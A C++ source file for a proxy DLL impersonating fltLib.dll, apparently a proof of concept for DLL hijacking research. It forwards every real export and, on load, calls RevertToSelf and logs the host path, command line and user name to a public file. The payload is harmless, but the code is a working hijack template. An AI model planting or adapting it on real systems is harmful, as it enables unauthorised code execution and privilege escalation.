// c:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat // cl.exe /D_USRDLL /D_WINDLL /MT /Tc raw.cpp /link /DLL /out:raw.dll /SUBSYSTEM:WINDOWS /MACHINE:x64 #pragma comment(linker, "/export:FilterAttach=C:\\Windows\\System32\\fltLib.FilterAttach,@1") #pragma comment(linker, "/export:FilterAttachAtAltitude=C:\\Windows\\System32\\fltLib.FilterAttachAtAltitude,@2") #pragma comment(linker, "/export:FilterClose=C:\\Windows\\System32\\fltLib.FilterClose,@3") #pragma comment(linker, "/export:FilterConnectCommunicationPort=C:\\Windows\\System32\\fltLib.FilterConnectCommunicationPort,@4") #pragma comment(linker, "/export:FilterCreate=C:\\Windows\\System32\\fltLib.FilterCreate,@5") #pragma comment(linker, "/export:FilterDetach=C:\\Windows\\System32\\fltLib.FilterDetach,@6") #pragma comment(linker, "/export:FilterFindClose=C:\\Windows\\System32\\fltLib.FilterFindClose,@7") #pragma comment(linker, "/export:FilterFindFirst=C:\\Windows\\System32\\fltLib.FilterFindFirst,@8") #pragma comment(linker, "/export:FilterFindNext=C:\\Windows\\System32\\fltLib.FilterFindNext,@9") #pragma comment(linker, "/export:FilterGetDosName=C:\\Windows\\System32\\fltLib.FilterGetDosName,@10") #pragma comment(linker, "/export:FilterGetInformation=C:\\Windows\\System32\\fltLib.FilterGetInformation,@11") #pragma comment(linker, "/export:FilterGetMessage=C:\\Windows\\System32\\fltLib.FilterGetMessage,@12") #pragma comment(linker, "/export:FilterInstanceClose=C:\\Windows\\System32\\fltLib.FilterInstanceClose,@13") #pragma comment(linker, "/export:FilterInstanceCreate=C:\\Windows\\System32\\fltLib.FilterInstanceCreate,@14") #pragma comment(linker, "/export:FilterInstanceFindClose=C:\\Windows\\System32\\fltLib.FilterInstanceFindClose,@15") #pragma comment(linker, "/export:FilterInstanceFindFirst=C:\\Windows\\System32\\fltLib.FilterInstanceFindFirst,@16") #pragma comment(linker, "/export:FilterInstanceFindNext=C:\\Windows\\System32\\fltLib.FilterInstanceFindNext,@17") #pragma comment(linker, "/export:FilterInstanceGetInformation=C:\\Windows\\System32\\fltLib.FilterInstanceGetInformation,@18") #pragma comment(linker, "/export:FilterLoad=fltLib.FilterLoad,@19") #pragma comment(linker, "/export:FilterReplyMessage=C:\\Windows\\System32\\fltLib.FilterReplyMessage,@20") #pragma comment(linker, "/export:FilterSendMessage=C:\\Windows\\System32\\fltLib.FilterSendMessage,@21") #pragma comment(linker, "/export:FilterUnload=C:\\Windows\\System32\\fltLib.FilterUnload,@22") #pragma comment(linker, "/export:FilterVolumeClose=C:\\Windows\\System32\\fltLib.FilterVolumeClose,@23") #pragma comment(linker, "/export:FilterVolumeFindClose=C:\\Windows\\System32\\fltLib.FilterVolumeFindClose,@24") #pragma comment(linker, "/export:FilterVolumeFindFirst=C:\\Windows\\System32\\fltLib.FilterVolumeFindFirst,@25") #pragma comment(linker, "/export:FilterVolumeFindNext=C:\\Windows\\System32\\fltLib.FilterVolumeFindNext,@26") #pragma comment(linker, "/export:FilterVolumeInstanceFindClose=C:\\Windows\\System32\\fltLib.FilterVolumeInstanceFindClose,@27") #pragma comment(linker, "/export:FilterVolumeInstanceFindFirst=C:\\Windows\\System32\\fltLib.FilterVolumeInstanceFindFirst,@28") #pragma comment(linker, "/export:FilterVolumeInstanceFindNext=C:\\Windows\\System32\\fltLib.FilterVolumeInstanceFindNext,@29") // This time we do need a proper proxy DLL, hence pragmas above. We are proxying fltLib.dll. #include #pragma comment(lib,"user32.lib") #pragma comment(lib,"kernel32.lib") #pragma comment(lib,"advapi32.lib") BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { RevertToSelf(); // if possible, revert the impersonation of the current thread char user_name[104]; memcpy(user_name, "", 104); char module_fname[MAX_PATH]; memcpy(module_fname, "", MAX_PATH); LPSTR command_line = GetCommandLineA(); GetModuleFileNameA(NULL, module_fname, MAX_PATH); HANDLE hFile = CreateFileA("C:\\users\\Public\\poc.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); DWORD max_user_name = 104; GetUserNameA(user_name, &max_user_name); DWORD bytesWritten; char lf[] = "\n"; char left_bracket[] = " [ "; char right_bracket[] = " ] "; if (hFile != INVALID_HANDLE_VALUE) { SetFilePointer(hFile, 0, NULL, FILE_END); WriteFile(hFile, module_fname, strlen(module_fname), &bytesWritten, NULL); WriteFile(hFile, left_bracket, strlen(left_bracket), &bytesWritten, NULL); WriteFile(hFile, command_line, strlen(command_line), &bytesWritten, NULL); WriteFile(hFile, right_bracket, strlen(left_bracket), &bytesWritten, NULL); WriteFile(hFile, left_bracket, strlen(left_bracket), &bytesWritten, NULL); WriteFile(hFile, user_name, strlen(user_name), &bytesWritten, NULL); WriteFile(hFile, right_bracket, strlen(left_bracket), &bytesWritten, NULL); WriteFile(hFile, lf, 1, &bytesWritten, NULL); CloseHandle(hFile); } } return TRUE; }